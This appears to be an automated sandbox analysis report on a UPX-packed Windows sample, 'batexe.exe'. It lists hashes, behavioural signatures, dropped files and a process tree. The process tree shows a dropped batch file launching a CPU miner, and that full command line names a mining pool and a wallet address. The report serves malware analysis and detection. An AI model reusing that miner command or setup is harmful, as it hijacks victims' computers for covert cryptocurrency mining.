Analysis

  • max time kernel
    293s
  • max time network
    301s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    17-02-2024 19:37

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3940
    • C:\Users\Admin\AppData\Local\Temp\5EBA.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\5EBA.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5EBA.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3572
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\614A.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4224
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2904

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\5EBA.tmp\b2e.exe

    Filesize

    11.3MB

    MD5

    486bd35532ee9a001d5939338ad89454

    SHA1

    9cbc7508c22798745b20a28e0e0d533379ed9344

    SHA256

    a76d9836dc29948b30f4908d369706f21605ddfa17cff27faeb7c6f3a5bd773c

    SHA512

    d87d00441163631d310a36f188dcc1fb8fd3076d5e3cf40088fe23b766b4f135fad5756c043aebe9539ea932fd3b51bd6a1acc6991c88412c74ea2fff1523bfd

  • C:\Users\Admin\AppData\Local\Temp\5EBA.tmp\b2e.exe

    Filesize

    5.3MB

    MD5

    3ebec8d20370bf2423aa880f85583f79

    SHA1

    5296d39b00908ba60d563a5aed59523a389b797f

    SHA256

    e22f8720da1988088d5e1e2d610e4991745e27c927c7eb90936b144eef401e08

    SHA512

    17242ba98121bc7bdcd0c9ab6f32d00d54d4dd5034f63992d33fb96985d5529de7787cd0ba2c6c8e3de6283bdfdab162194e3e788c7025326a0a5f390e7fadf3

  • C:\Users\Admin\AppData\Local\Temp\5EBA.tmp\b2e.exe

    Filesize

    3.6MB

    MD5

    34ee9b2f1e47303212ff0391c7597082

    SHA1

    63ba3745baf50cb897ce364c65df3b4785aeaeff

    SHA256

    747a4043e8572c29a2f266b7f37ca0f0841abbb4f3caf5cfa351935aeebb2e3f

    SHA512

    d2e1f08d271f21e03fc915e0e886652a0c4cc4e8a70d5127a414d97770c269779f9d0ab3c9e0594560b573569090f18110a34ef35394edb40b0ad9161c3afec2

  • C:\Users\Admin\AppData\Local\Temp\614A.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    808KB

    MD5

    614337127ce29362b153604fc3976cf2

    SHA1

    25e9675aa9c1a5d7336a9ff973b9e4586d9b1f54

    SHA256

    b88d4475f1003f0304601a939a59b7c012ac1b5aba7cbfd36289344f52d77375

    SHA512

    61d43566bff7d0de606240292e1c8dc62dd95d521b600bfbe1d38c6f56b00564a4a5031a24b84679cb626a1807a9bf65e4ef9073b4853888366bd1984c6f2168

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    912KB

    MD5

    6fdbf7e8680d497dbec6f7fb32df16f8

    SHA1

    f36533b64e784f9f2b8b073f486b036b653db633

    SHA256

    6a9eb3e476e0ff9312e411505266053d3692a29726934a4c72647089a279ff65

    SHA512

    53641f4157bff3e0ffb4d9207e8864732577e44d4f3a57b9b01c5f4eb978990ec231a8ab4eea4dd068665e144e129f4b832235d268c3127c8746e46e7a3b8fd3

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    836KB

    MD5

    aeab40ed9a8e627ea7cefc1f5cf9bf7a

    SHA1

    5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

    SHA256

    218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

    SHA512

    c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    535KB

    MD5

    6ae48710ccfbbe0cb480fd8e8be9e6f1

    SHA1

    233b7378a0e27661eeb753bfcb5fa1d6807d3e94

    SHA256

    515235c1066cf785c64052cee21522dac5575b15af0721c578cc5000fdcbcd63

    SHA512

    0903f25ca1e578958f98dde43c14e85862da0845d35d9ab0f74021bf597d939a891d42773f45e51ad6b6161a311c7a6bdb217ad5136b7e3bb3aaadaaa5f8c506

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    728KB

    MD5

    44bb54a26019b3081cd7d3f9659e8bcf

    SHA1

    96c656ffa33777221d737b01564cc0782479f215

    SHA256

    4941eeb0426c1e4d7a51b4870c351043e0e8b8b4b347affead47d378a1d9f3be

    SHA512

    9da9d87c2bd5746eca627927608aa357fca68b0967cbd3217e7d9dc234ffc61ddf17d3b2066b8610449bcf51e244f94a5165dafb774547f54c75580cf5424616

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    538KB

    MD5

    143d1a5c4661f690ade067b67baf4977

    SHA1

    918563eb7b5a0ed60edef8f67053fcfd6cb47669

    SHA256

    1126618514bf19477dfe9d63ae99f83eb4b8e850f14e2a2440e47fd49016a7d3

    SHA512

    34ec6fd4aba4ba097a11791573e6a0905c7caaaaad1b86f348feb5165104e8f9ecd8a979f092715122aed964bc56ffb603fc61350a3da23b2cb24da40ca0b3b3

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    1020KB

    MD5

    2be490a21641ef0bc2ed94e991bafe7c

    SHA1

    38444c299081d61ae336461115053a7dfd2b33a3

    SHA256

    50e94106af3b387f3e34aff88aa003182141c20a4d61f41c15109d97855d3e3c

    SHA512

    0b84671b6073bc46b58d4b9b2baee1a845e4959bef908e7170158d1718a82ae98e953e2558db3e8a4dd174998e3c9c97bc79314f21d8f0d3e1acdbde90a88172

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    879KB

    MD5

    dbae45cde3492fa1766a3443e9105c9d

    SHA1

    452b66ba0f537a1ccd80510ca1f8c601ed57028c

    SHA256

    591120897cc3ea6290ae903260b75aa7342074728e49b55fc9291c452cdc31c2

    SHA512

    43200f36d13040ee256b6af6bdbedd75803add099ccccf29e692fb3153f2fc8dcb20cf7956a5c2f3374de91f55ef38de8c01b179d08a563ef4f254f44b0a5401

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    725KB

    MD5

    51e427eb91952b701658db18ff5f4fb7

    SHA1

    fccbeadb1fbf1ebc764ccb15ec65aad39584c2e6

    SHA256

    d169070ff637465593746dbd8d6207a172d81d71c3f2c6b6aa2a978c9e898db5

    SHA512

    9ee35fdf946b94abb2d7818469d65265c00cbd11c26b95cbf43e363d2a179b41ef390ff9f27dfa7d9b3fd8e0057d774be76f8bb2bb506f95eb17f2e40e92b901

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    600KB

    MD5

    227b4cdf97957bc6f9f9141a518e610d

    SHA1

    3b301d0c2a91d55a50deba74f51a5bf86265915a

    SHA256

    0f0627b40621b20ff23c1249269f2e0f836a036b95990022d48a435967e6f57a

    SHA512

    b4385096459845c56d45a290e2bf1770c8be6a4277e041d041731d14d16cf9bef78d0f7dc6d62928c2e9f9a548e5638e31827dc6a89a72ec34ac2636656c69da

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    605KB

    MD5

    9b14e8d54e3960b173bd31c92ba5ffcb

    SHA1

    bc16a586ce5e4afa53630bc3d4e1e6d57e75cd9a

    SHA256

    107d416f71c215bd0d7d03d48f1ae15ec1e947e82fd3164a9fa8955e82a16b01

    SHA512

    963034f267595ca670a450f9c41d9d14ef5e71a27eaeae4b1a32c70f2ae92ed403863dee85d9da19554cce426ca206340ad8b4d1c11f30e498257160daf144f6

  • memory/2904-44-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/2904-54-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2904-43-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2904-45-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/2904-104-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2904-46-0x0000000054CD0000-0x0000000054D68000-memory.dmp

    Filesize

    608KB

  • memory/2904-47-0x0000000001030000-0x00000000028E5000-memory.dmp

    Filesize

    24.7MB

  • memory/2904-48-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2904-99-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2904-89-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2904-59-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2904-64-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2904-69-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2904-84-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3572-7-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/3572-53-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/3940-9-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB